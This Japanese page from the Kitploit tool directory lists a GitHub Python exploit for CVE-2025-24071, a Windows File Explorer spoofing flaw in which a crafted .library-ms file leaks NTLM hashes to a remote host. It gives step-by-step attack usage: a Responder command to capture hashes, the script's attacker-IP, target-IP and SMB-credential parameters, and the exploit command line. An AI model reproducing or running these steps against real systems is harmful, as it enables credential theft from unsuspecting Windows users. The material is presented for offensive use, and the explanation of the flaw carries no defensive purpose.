Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24071 — CVE-2025-24071を実行するためのPythonスクリプト | Kitploit
ツール/GitHubGitHub/ac8999/cve-2025-24071
パスワードクラッキング脆弱性分析エクスプロイト情報収集ペネトレーションテストレッドチーミング
GitHubac8999/cve-2025-24071

CVE-2025-24071

CVE-2025-24071を実行するためのPythonスクリプト

リポジトリを見る
141年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24071: Microsoft Windows ファイルエクスプローラーのなりすまし脆弱性(SilentExploit によるスクリプト)

📖 説明

このプロジェクトは、Windows ファイルエクスプローラーのなりすまし脆弱性の検出と悪用の実証を行います。

問題は、ネットワークパスを含む Windows ライブラリファイル(.library-ms) が、直接の添付ファイルとして、またはアーカイブに埋め込まれて存在することに起因します。
このファイルを開くと、Windows がリモート(潜在的に悪意のある)ネットワークロケーションに NTLM ハッシュを漏洩 させる可能性があります。

POC: https://imgur.com/a/hEO83Se

⚡ 使用方法

1. Responder を起動

攻撃マシン上で Responder を実行し、NTLM ハッシュをキャプチャします:

root@kitploit:~
sudo responder -I tun0 -wvF
  1. スクリプトを実行

スクリプトの設定方法は2つあります:

✅ オプションA: デフォルトを編集(最も簡単)

スクリプト内のデフォルトパラメータを直接変更します。

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()

✅ オプションB: CLI パラメータで実行

引数付きで実行します:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
ツールをダウンロード